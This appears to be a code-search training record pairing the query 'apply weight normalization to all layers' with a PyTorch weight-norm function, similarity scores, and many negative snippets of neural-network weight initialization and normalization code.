[ "0.67468584", "0.62949085", "0.6285982", "0.62006986", "0.6102082", "0.60385245", "0.6021358", "0.60148615", "0.60062915", "0.5981237", "0.59416723", "0.590252", "0.5898757", "0.5888632", "0.58052456", "0.5799055", "0.5795089", "0.5771385", "0.5755582", "0.5748591", "0.57218456", "0.57085013", "0.5690192", "0.5684907", "0.56731766", "0.56665397", "0.5660035", "0.5656763", "0.5654221", "0.5647478", "0.56444424", "0.5636443", "0.5636206", "0.56318617", "0.56295055", "0.561453", "0.5608455", "0.56081814", "0.56063396", "0.56005216", "0.5598679", "0.5596407", "0.5575576", "0.5574488", "0.55723345", "0.5571318", "0.55502874", "0.5547292", "0.5545264", "0.5541341", "0.5527504", "0.5526878", "0.5506348", "0.5505247", "0.5503381", "0.5501094", "0.5492081", "0.54789484", "0.5472313", "0.5465623", "0.54359794", "0.54276305", "0.54250824", "0.5421294", "0.5419131", "0.54180276", "0.54095364", "0.5406432", "0.5400964", "0.5398996", "0.53981626", "0.53956765", "0.5394608", "0.53893787", "0.53877723", "0.5387108", "0.53867245", "0.53825134", "0.5381987", "0.53803325", "0.5365756", "0.53627354", "0.53567743", "0.5355726", "0.535227", "0.53457123", "0.53452665", "0.5344346", "0.53421056", "0.5340289", "0.53397626", "0.5337732", "0.5336359", "0.53311986", "0.5331116", "0.5328858", "0.5325253", "0.53216684", "0.5316128", "0.5316128", "0.5316128" ]
0.0
-1
Apply weight normalization module from all of the layers.
def apply_weight_norm(self): def _apply_weight_norm(m): if isinstance(m, torch.nn.Conv1d) or isinstance( m, torch.nn.ConvTranspose1d ): torch.nn.utils.weight_norm(m) logging.debug(f"Weight norm is applied to {m}.") self.apply(_apply_weight_norm)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def associate_normalization_layers(self, model):\n if (len(self.leaf_modules) == 0):\n self.retrieve_leaf_modules(model) \n # Association list\n self.norm_modules = []\n self.prune_modules = []\n # Current weighted layer\n cur_weighted = None\n # Associate norm layers to their immediate previous weighted layers\n for name, m in self.leaf_modules:\n if (m.__class__ in [nn.Linear, nn.Conv1d, nn.Conv2d, nn.Conv3d, nn.ConvTranspose2d, nn.ConvTranspose3d]):\n cur_weighted = m\n if (m.__class__ in [nn.RNN, nn.GRU, nn.LSTM]):\n cur_weighted = m\n if ('Norm' in str(m.__class__)):\n if (cur_weighted is not None):\n self.norm_modules.append((m, cur_weighted))", "def _compute_weights(self):\n with variable_scope.variable_scope('compute_weights'):\n self.layer.W = nn_impl.l2_normalize(\n self.layer.v, axis=self.norm_axes) * self.layer.g", "def _compute_weights(self):\n with variable_scope.variable_scope('compute_weights'):\n self.layer.W = nn_impl.l2_normalize(\n self.layer.v, axis=self.norm_axes) * self.layer.g", "def _init_weights(self):\n for m in self.modules():\n if type(m) in {\n nn.Linear,\n nn.Conv3d,\n nn.Conv2d,\n nn.ConvTranspose2d,\n nn.ConvTranspose3d\n }:\n nn.init.kaiming_normal_(\n m.weight.data, a=0, mode='fan_out', nonlinearity='relu',\n )\n if m.bias is not None:\n fan_in, fan_out = \\\n nn.init._calculate_fan_in_and_fan_out(m.weight.data)\n bound = 1 / math.sqrt(fan_out)\n nn.init.normal_(m.bias, -bound, bound)", "def normalize_weights(self):\n total_weight = sum(self.weights)\n self.norm_weights = self.weights / float(total_weight)", "def _initialize_weights(self):\r\n for m in self.modules():\r\n if isinstance(m, nn.Conv2d):\r\n m.weight.data.normal_(0, 0.05)\r\n if m.bias is not None:\r\n m.bias.data.zero_()", "def initialize_weights(self):\n for layer in self._cnn_layers:\n weights_initializer.WeightsInitializer.initialize_layer_or_model(layer)", "def init_weights(self):\n # We don't use the `init_weights()` function in BaseModule, since it\n # doesn't support the initialization method from `reset_parameters()`\n # in Pytorch.\n if self.with_backbone:\n self.backbone.init_weights()\n\n if self.with_neck:\n for m in self.neck.modules():\n if isinstance(m, _ConvNd) or isinstance(m, _BatchNorm):\n m.reset_parameters()\n\n if self.with_head:\n for m in self.head.modules():\n if isinstance(m, _ConvNd) or isinstance(m, _BatchNorm):\n m.reset_parameters()", "def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):\n xavier_uniform_(m.weight)\n if m.bias is not None:\n zeros_(m.bias)", "def normalize_weights(self):\n \n # Set negative weights to zero\n # Normalize to sum to one.\n \n\n\n self.new_weight=[]\n for i in self._weights:\n if any(i < 0 for i in self._weights):\n self.new_weight = [0,1]\n\n elif all(i == 0 for i in self._weights):\n i = 1/len(self._weights)\n self.new_weight.append(i)\n else:\n i = i/sum(self._weights)\n self.new_weight.append(i)\n\n # If the weights are all zeros, set weights equal to 1/k, where k is the number\n # of components.\n self._weights = self.new_weight\n self._weights = np.round(self._weights,3)", "def normalizeWeights(self):\n for wt in self.weights:\n wt[wt>1] = 1\n wt[wt<-1] = -1\n for bs in self.bias:\n bs[bs>1] = 1\n bs[bs<-1] = -1", "def _reset_weights(m):\n\n nn = import_optional_dependency(\"torch.nn\")\n init = import_optional_dependency(\"torch.nn.init\")\n if isinstance(m, nn.Conv1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.BatchNorm1d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm2d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm3d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.Linear):\n init.xavier_normal_(m.weight.data)\n init.normal_(m.bias.data)\n elif isinstance(m, nn.LSTM):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.LSTMCell):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRU):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRUCell):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)", "def remove_norms(module_: \"WN\") -> \"WN\":\n module_.start = torch.nn.utils.remove_weight_norm(module_.start_conv)\n module_.cond_layer = torch.nn.utils.remove_weight_norm(module_.cond_layer)\n for i, layer_ in enumerate(module_.in_layers):\n layer_ = DepthwiseSeparableConv1d.remove_batch_norm(layer_)\n module_.in_layers[i] = layer_\n for i, layer_ in enumerate(module_.res_skip_layers):\n layer_ = torch.nn.utils.remove_weight_norm(layer_)\n module_.res_skip_layers[i] = layer_\n return module_", "def _weight_initializer(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.0)\n nn.init.constant_(m.bias, 0.0)", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=2, dim=1)\n self.relation_embeddings.weight.data = normalize(self.relation_embeddings.weight.data,\n p=2, dim=1)\n self.ent_proj_vects.data = normalize(self.ent_proj_vects.data, p=2, dim=1)\n self.rel_proj_vects.data = normalize(self.rel_proj_vects.data, p=2, dim=1)", "def _weight_initializer(self):\n for m in self.modules():\n if isinstance(m, nn.ConvTranspose2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.0)\n nn.init.constant_(m.bias, 0.0)", "def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n xavier_init(m)", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=2, dim=1)\n self.relation_embeddings.weight.data = normalize(self.relation_embeddings.weight.data,\n p=2, dim=1)\n self.projection_matrices.data = normalize(self.projection_matrices.data, p=2, dim=2)", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=self.norm_type, dim=1)", "def init_weights(self, clz):\n for ch in self.children():\n if issubclass(ch.__class__, nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: clz._init_weights(self.lrm, module))", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=self.norm_type, dim=1)\n self.normal_vectors.data = normalize(self.normal_vectors, p=2, dim=1)", "def remove_weight_norm_(self):\n\n def _remove_weight_norm(m):\n try:\n torch.nn.utils.remove_weight_norm(m)\n except ValueError:\n return\n\n self.apply(_remove_weight_norm)", "def init_weight(self):\n init_layer(self.conv1)\n init_layer(self.conv2)\n init_bn(self.norm1)\n init_bn(self.norm2)", "def normalize(self, weights):\n tot = sum(weights)\n newW = [-1] * self.numParticles\n for i in range(len(weights)):\n newW[i] = weights[i] / tot\n return newW", "def layer_normalize_(self, ref_point: 'ModelParameters', order=2):\n # in-place normalize each parameter\n for layer_idx, parameter in enumerate(self.parameters, 0):\n parameter *= (ref_point.layer_norm(layer_idx, order) / self.layer_norm(layer_idx, order))", "def init_weights(self):\n\n for ch in self.children():\n if issubclass(ch.__class__, torch.nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: self.transformer.__class__._init_weights(self.transformer, module))", "def _rescale_module(module):\n for sub in module.modules():\n if isinstance(sub, (nn.Conv1d, nn.ConvTranspose1d, nn.Conv2d, nn.ConvTranspose2d)):\n std = sub.weight.std().detach()\n scale = (std / 0.1) ** 0.5\n sub.weight.data /= scale\n if sub.bias is not None:\n sub.bias.data /= scale", "def init_weights(layer):\r\n layer_name = layer.__class__.__name__\r\n if layer_name.find(\"Conv\") != -1:\r\n layer.weight.data.normal_(0.0, 0.02)\r\n elif layer_name.find(\"BatchNorm\") != -1:\r\n layer.weight.data.normal_(1.0, 0.02)\r\n layer.bias.data.fill_(0)", "def init_weights(layer):\n layer_name = layer.__class__.__name__\n if layer_name.find(\"Conv\") != -1 and hasattr(layer, 'weight'):\n layer.weight.data.normal_(0.0, 0.02)\n elif layer_name.find(\"BatchNorm\") != -1 and hasattr(layer, 'weight'):\n layer.weight.data.normal_(1.0, 0.02)\n layer.bias.data.fill_(0)", "def _compute_weights(self):\n with tf.name_scope('compute_weights'):\n self.layer.kernel = tf.nn.l2_normalize(\n self.v, axis=self.kernel_norm_axes) * self.g", "def init_weights(self):\n for m in self.cls_convs:\n normal_init(m.conv, std=0.01)\n for m in self.reg_convs:\n normal_init(m.conv, std=0.01)\n bias_cls = bias_init_with_prob(0.01)\n normal_init(self.retina_cls, std=0.01, bias=bias_cls)\n normal_init(self.retina_reg, std=0.01)", "def apply_on_layer(self, layer):\n init_g = Constant(1.)\n\n try:\n weight_tag = 'W' if hasattr(layer, 'W') else 'U'\n except AttributeError:\n raise AttributeError(\"Trying to call weight norm on {} \".format(layer)+\\\n \"without layer.W or layer.U defined\")\n weights = getattr(layer, weight_tag)\n\n Wndim = weights.get_value().ndim\n if Wndim == 4:\n W_axes_to_sum = (1,2,3)\n W_dimshuffle_args = (0,'x','x','x')\n elif Wndim == 5:\n W_axes_to_sum = (1,2,3,4)\n W_dimshuffle_args = (0,'x','x','x','x')\n elif Wndim == 3 :\n raise NotImplementedError(\"What is a weight with 3 dimensions?\")\n else :\n W_axes_to_sum = 0\n W_dimshuffle_args = ('x',0)\n\n if self.train_g is not None:\n g = init_g(layer.output_dims)\n g = theano.shared(g, name=layer.prefix+'_g')\n if self.train_g :\n layer.params += [g]\n\n new_weights = weights * (\n g / T.sqrt(1e-6 + T.sum(T.square(weights),\n axis=W_axes_to_sum))).dimshuffle(*W_dimshuffle_args)\n layer.g = g\n else:\n new_weights = weights / \\\n T.sqrt(1e-6 + T.sum(T.square(weights),\n axis=W_axes_to_sum,keepdims=True))\n\n setattr(layer, weight_tag, new_weights)", "def normalize_weights(w, dims=(0,), bias=1e-5):\n with tf.name_scope('normalization'):\n return w / (tf.sqrt(tf.reduce_sum(tf.square(w), dims, keep_dims=True) + bias))", "def remove_weight_norm(self):\n\n def _remove_weight_norm(m):\n try:\n logging.debug(f\"Weight norm is removed from {m}.\")\n torch.nn.utils.remove_weight_norm(m)\n except ValueError: # this module didn't have weight norm\n return\n\n self.apply(_remove_weight_norm)", "def remove_weight_norm(self):\n\n def _remove_weight_norm(m):\n try:\n logging.debug(f\"Weight norm is removed from {m}.\")\n torch.nn.utils.remove_weight_norm(m)\n except ValueError: # this module didn't have weight norm\n return\n\n self.apply(_remove_weight_norm)", "def init_weights(self):\n for m in self.cls_convs:\n normal_init(m.conv, std=0.01)\n for m in self.reg_convs:\n normal_init(m.conv, std=0.01)\n normal_init(self.atss_reg, std=0.01)\n normal_init(self.atss_iou, std=0.01)\n bias_cls = bias_init_with_prob(0.01)\n normal_init(self.atss_cls, std=0.01, bias=bias_cls)", "def layer_norm(input, normalized_shape, weight, bias, eps=1e-5):\n return FunctionLib.apply(\n 'LayerNorm', input.device, [input, weight, bias],\n axis=input.ndimension() - len(normalized_shape), epsilon=eps)", "def init_weights(model, fc_init_std=0.01):\n for m in model.modules():\n if isinstance(m, nn.Conv3d):\n \"\"\"\n Follow the initialization method proposed in:\n {He, Kaiming, et al.\n \"Delving deep into rectifiers: Surpassing human-level\n performance on imagenet classification.\"\n arXiv preprint arXiv:1502.01852 (2015)}\n \"\"\"\n c2_msra_fill(m, nonlinearity=('relu', 'leaky_relu')[0])\n # c2_xavier_fill(m)\n # nn.init.xavier_normal_(m.weight)\n # nn.init.xavier_uniform_(m.weight)\n # if m.bias is not None: # pyre-ignore\n # nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm3d) or isinstance(m, nn.InstanceNorm3d):\n m.weight.data.fill_(1.0)\n m.bias.data.zero_()\n if isinstance(m, nn.Linear): # This assumes nn.Linear is the final layers\n # TODO check to see if this is effective in this architecture since the final is a conv3d\n m.weight.data.normal_(mean=0.0, std=fc_init_std)\n m.bias.data.zero_()", "def normalize_weights(self, w):\n n = w.astype(np.float64, copy=True)\n c = float(np.sum(w))\n n /= c\n return n", "def forward(self, x, mask):\n for layer in self.layers:\n x = layer(x, mask)\n return self.norm(x)", "def _setWeights(self):\r\n for layer in self.layer_names:\r\n raw_w = getattr(self, f'{layer}_raw')\r\n self.module._parameters[layer] = F.dropout(raw_w, p=self.weight_pro, training=self.training)", "def remove_norms(self):\n dev = next(self.parameters()).device\n for name, module in self.named_modules():\n try:\n nn.utils.remove_spectral_norm(module, name='weight_hh_l0')\n print(\"Removed spectral norm from {}\".format(name))\n except:\n pass\n try:\n nn.utils.remove_spectral_norm(module, name='weight_hh_l0_reverse')\n print(\"Removed spectral norm from {}\".format(name))\n except:\n pass\n try:\n nn.utils.remove_weight_norm(module)\n print(\"Removed wnorm from {}\".format(name))\n except:\n pass\n self.to(device=dev)", "def train(self, mode=True, freeze_bn=False):\n super(WideResNet, self).train(mode)\n self.freeze_bn = freeze_bn\n if self.freeze_bn:\n print(\"Freezing Mean/Var of BatchNorm2D.\")\n print(\"Freezing Weight/Bias of BatchNorm2D.\")\n if self.freeze_bn:\n for m in self.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def forward(self, x, mask):\n \"Pass the input (and mask) through each layer in turn\"\n for layer in self.layers:\n x = layer(x, mask)\n return self.norm(x)", "def weight_norm(module, name=\"weight\", dim=0):\n WeightNorm.apply(module, name, dim)\n return module", "def _init_weights(self):\n nn.init.xavier_normal_(self.out.weight)", "def normalize(self):\n norm_val = self.sum2/self.sum1\n self.sum1=0\n\n for sentence in self.data_set:\n sentence.weight *= norm_val\n self.sum1 += sentence.weight", "def init_weights(net):\n for m in net.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_uniform_(m.weight)\n # nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n return net", "def initialize(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_normal_(m.weight)\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)", "def filter_normalize_(self, ref_point: 'ModelParameters', order=2):\n for l in range(len(self.parameters)):\n # normalize one-dimensional bias vectors\n if len(self.parameters[l].size()) == 1:\n self.parameters[l] *= (ref_point.parameters[l].norm(order) / self.parameters[l].norm(order))\n # normalize two-dimensional weight vectors\n for f in range(len(self.parameters[l])):\n self.parameters[l][f] *= ref_point.filter_norm((l, f), order) / (self.filter_norm((l, f), order))", "def update_weights(self):\n\n self.weights -= self.loss_grads\n self.loss_grads = np.zeros(self.weights.shape)", "def init_weights(self, module):\n if isinstance(module, (torch.nn.Linear, torch.nn.Embedding, torch.nn.LayerNorm)):\n module.weight.data.normal_(mean=0.0, std=self.initializer_range)\n if isinstance(module, (torch.nn.Linear, torch.nn.LayerNorm)) and module.bias is not None:\n module.bias.data.zero_()", "def reset_all_weights(model: nn.Module) -> None:\n\n @torch.no_grad()\n def weight_reset(m: nn.Module):\n # - check if the current module has reset_parameters & if it's callabed called it on m\n reset_parameters = getattr(m, \"reset_parameters\", None)\n if callable(reset_parameters):\n m.reset_parameters()\n\n # Applies fn recursively to every submodule see: https://pytorch.org/docs/stable/generated/torch.nn.Module.html\n model.apply(fn=weight_reset)", "def update_layers(self):\n\n # Para cada layer atualiza utilizando o gradiente descendente e o learning rate\n for layer in self.layers:\n layer.update_layer(self.learning_rate)", "def weights_init(mod):\n classname = mod.__class__.__name__\n if classname.find('Conv') != -1:\n mod.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n mod.weight.data.normal_(1.0, 0.02)\n mod.bias.data.fill_(0)", "def init_weights(self):\n\n params = torch.load(self.resnet_weight)\n\n self.fc1.weight.data = params['state_dict']['module.fc.weight'].clone()\n self.fc1.bias.data = params['state_dict']['module.fc.bias'].clone()\n\n\n r = np.sqrt(1.) / np.sqrt(self.fc3.in_features +\n self.fc3.out_features)\n self.fc3.weight.data.uniform_(-r, r)\n self.fc3.bias.data.fill_(0)\n r = np.sqrt(1.) / np.sqrt(self.fc2.in_features +\n self.fc2.out_features)\n self.fc2.weight.data.uniform_(-r, r)\n self.fc2.bias.data.fill_(0)\n r = np.sqrt(1.) / np.sqrt(self.fc4.in_features +\n self.fc4.out_features)\n self.fc4.weight.data.uniform_(-r, r)\n self.fc4.bias.data.fill_(0)", "def spectral_norm_parallel(self):\n weights = {}\n for l in self.all_conv_layers:\n weight = l.weight_normalized\n weight_mat = weight.view(weight.size(0), -1)\n if weight_mat.shape not in weights:\n weights[weight_mat.shape] = []\n weights[weight_mat.shape].append(weight_mat)\n loss = 0\n for i in weights:\n weights[i] = torch.stack(weights[i], dim=0)\n with torch.no_grad():\n num_iter = self.num_power_iter\n if i not in self.sr_u:\n num_w, row, col = weights[i].shape\n self.sr_u[i] = F.normalize(torch.ones(num_w, row).normal_(0, 1), dim=1, eps=0.001)\n self.sr_v[i] = F.normalize(torch.ones(num_w, col).normal_(0, 1), dim=1, eps=0.001)\n num_iter = 10 * self.num_power_iter\n for j in range(num_iter):\n self.sr_v[i] = F.normalize(torch.matmul(self.sr_u[i].unsqueeze(1), weights[i]).squeeze(1), dim=1, eps=0.001)\n self.sr_u[i] = F.normalize(torch.matmul(weights[i], self.sr_v[i].unsqueeze(2)).squeeze(2), dim=1, eps=0.001)\n sigma = torch.matmul(self.sr_u[i].unsqueeze(1), torch.matmul(weights[i], self.sr_v[i].unsqueeze(2)))\n loss += torch.sum(sigma)\n return loss", "def normalize_weight(self, Z):\n self.weight /= Z", "def init_weights(self):\n for i in range(5):\n default_init_weights(getattr(self, f'conv{i+1}'), 0.1)", "def initialize_weights(self):\n weights_initializer.WeightsInitializer.initialize_layer_or_model(\n self._batch)", "def update_weights(self):\n activation, activation_p = self.feedforward()\n # initialize delta_weights\n delta_w = np.zeros(2)\n # simultaneous calculate delta_weights\n for i, element in enumerate(self.y):\n delta_w += (activation[i]-element)*(activation_p[i])*self.X[i]\n # update weight\n self.weights -= self.alfa*delta_w", "def normalise(self):\n total = 0\n for feat_set in self.values():\n for value in feat_set.values():\n total += value\n norm = 1/total\n for feat_set in self.values():\n for feat in feat_set:\n feat_set[feat] *= norm\n return self", "def _init_norm(self, weights):\n from tensorflow.python.ops.linalg_ops import norm\n with variable_scope.variable_scope('init_norm'):\n flat = array_ops.reshape(weights, [-1, self.layer_depth])\n return array_ops.reshape(norm(flat, axis=0), (self.layer_depth,))", "def _init_norm(self, weights):\n from tensorflow.python.ops.linalg_ops import norm\n with variable_scope.variable_scope('init_norm'):\n flat = array_ops.reshape(weights, [-1, self.layer_depth])\n return array_ops.reshape(norm(flat, axis=0), (self.layer_depth,))", "def initialize_weights(self):\n tf.nest.map_structure(\n weights_initializer.WeightsInitializer.initialize_layer_or_model,\n self._layer_nest)", "def init_weights(m):\n if isinstance(m, nn.Conv2d):\n # Note that there is no bias due to BN\n fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(mean=0.0, std=math.sqrt(2.0 / fan_out))\n elif isinstance(m, nn.BatchNorm2d):\n zero_init_gamma = cfg.BN.ZERO_INIT_FINAL_GAMMA\n zero_init_gamma = hasattr(m, \"final_bn\") and m.final_bn and zero_init_gamma\n m.weight.data.fill_(0.0 if zero_init_gamma else 1.0)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.weight.data.normal_(mean=0.0, std=0.01)\n m.bias.data.zero_()", "def normalise(self):\n s = self._sum()\n if s != 0:\n for element, value in self.focals.items():\n self.focals[element] /= s", "def weights_init(m):\n if (\n isinstance(m, nn.Linear)\n or isinstance(m, nn.EmbeddingBag)\n or isinstance(m, nn.Embedding)\n or isinstance(m, SparseLinear)\n ):\n nn.init.xavier_normal_(m.weight)", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def reset_model(model):\n\n\tfor layer in model.layers:\n\t\t# Note: these are custom depending on the layer type\n\t\tif '.MoleculeConv' in str(layer):\n\t\t\tW_inner = layer.init_inner((layer.inner_dim, layer.inner_dim))\n\t\t\tb_inner = np.zeros((1, layer.inner_dim))\n\t\t\t# Inner weights\n\t\t\tlayer.W_inner.set_value((T.tile(W_inner, (layer.depth + 1, 1, 1)).eval() + \\\n\t\t\t\tinitializations.uniform((layer.depth + 1, layer.inner_dim, layer.inner_dim)).eval()).astype(np.float32))\n\t\t\tlayer.b_inner.set_value((T.tile(b_inner, (layer.depth + 1, 1, 1)).eval() + \\\n\t\t\t\tinitializations.uniform((layer.depth + 1, 1, layer.inner_dim)).eval()).astype(np.float32))\n\n\t\t\t# Outer weights\n\t\t\tW_output = layer.init_output((layer.inner_dim, layer.units), scale = layer.scale_output)\n\t\t\tb_output = np.zeros((1, layer.units))\n\t\t\t# Initialize weights tensor\n\t\t\tlayer.W_output.set_value((T.tile(W_output, (layer.depth + 1, 1, 1)).eval()).astype(np.float32))\n\t\t\tlayer.b_output.set_value((T.tile(b_output, (layer.depth + 1, 1, 1)).eval()).astype(np.float32))\n\t\t\tlogging.info('graphFP layer reset')\n\n\t\telif '.Dense' in str(layer):\n\t\t\tlayer.W.set_value((layer.init(layer.W.shape.eval()).eval()).astype(np.float32))\n\t\t\tlayer.b.set_value(np.zeros(layer.b.shape.eval(), dtype=np.float32))\n\t\t\tlogging.info('dense layer reset')\n\n\t\telif '.Dropout' in str(layer):\n\t\t\tlogging.info('dropout unchanged')\n\t\telse:\n\t\t\traise ValueError('Unknown layer {}, cannot reset weights'.format(str(layer)))\n\tlogging.info('Reset model weights')\n\treturn model", "def init_weights(self) -> None:\n nn.init.kaiming_normal_(self._U)\n nn.init.kaiming_normal_(self._W)\n nn.init.kaiming_normal_(self._V)\n\n nn.init.normal_(self._b)", "def normalization(channels):\n return GroupNorm32(32, channels)", "def init_weights(m):\n if isinstance(m, nn.Conv2d):\n # Note that there is no bias due to BN\n fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(mean=0.0, std=np.sqrt(2.0 / fan_out))\n elif isinstance(m, nn.BatchNorm2d):\n zero_init_gamma = cfg.BN.ZERO_INIT_FINAL_GAMMA\n zero_init_gamma = hasattr(m, \"final_bn\") and m.final_bn and zero_init_gamma\n m.weight.data.fill_(0.0 if zero_init_gamma else 1.0)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.weight.data.normal_(mean=0.0, std=0.01)\n m.bias.data.zero_()", "def forward_propagate(self):\n for i in range(0, len(self.output_layer)):\n output = 0\n\n # Loop through each Neuron in the hidden layer\n for neuron in self.hidden_layer:\n output += neuron.weights[i] * neuron.output\n\n # Update summation for output classifier\n self.output_layer[i] = output", "def weights_init_normal(m):\r\n if isinstance(m, nn.Conv2d):\r\n m.weight.data.normal_(0.0, 0.02)\r\n elif isinstance(m, nn.BatchNorm2d):\r\n m.weight.data.normal_(1.0, 0.02)\r\n m.bias.data.fill_(0)", "def model_normalize_(self, ref_point: 'ModelParameters', order=2):\n for parameter in self.parameters:\n parameter *= (ref_point.model_norm(order) / self.model_norm())", "def weights_init(m):\n if(type(m) == nn.ConvTranspose2d or type(m) == nn.Conv2d):\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif(type(m) == nn.BatchNorm2d):\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)", "def weights_init(m):\n if(type(m) == nn.ConvTranspose2d or type(m) == nn.Conv2d):\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif(type(m) == nn.BatchNorm2d):\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)", "def apply_weights(self):\n return self.X.dot(self.get_weights())", "def extract_weights(self, name):\n\n # Extract weights\n weight_layer = (self.merged_model).get_layer(name)\n weights = weight_layer.get_weights()[0]\n\n # Normalize\n # weights = weights / np.linalg.norm(weights, axis = 1).reshape((-1, 1))\n return weights", "def normalize_all(self):\n #for i, vector in enumerate(self.real_vectors):\n # self.real_vectors[i] /= np.linalg.norm(vector)\n self.vectors /= np.linalg.norm(self.vectors, axis=1).reshape(-1,1)\n for i, vector in enumerate(self.real_vectors):\n vector.set(self.vectors[i])", "def normalize_weights(self, labels, weights):\n if self._ragged:\n labels, _, weights, _ = utils.ragged_to_dense(labels, None, weights)\n return self._normalize_weights_impl(labels, weights)", "def normalizeWeights(self):\n\n\t\t# Normalizing crossover and mutation handler weights, result is a CDF\n\t\ttotal = sum(self.mutation_handlers_weights)\n\t\tcumsum = 0\n\t\tfor i in range(len(self.mutation_handlers_weights)):\n\t\t\tcumsum += self.mutation_handlers_weights[i]\n\t\t\tself.mutation_handlers_weights[i] = cumsum/total\n\t\ttotal = sum(self.crossover_handlers_weights)\n\t\tcumsum = 0\n\t\tfor i in range(len(self.crossover_handlers_weights)):\n\t\t\tcumsum += 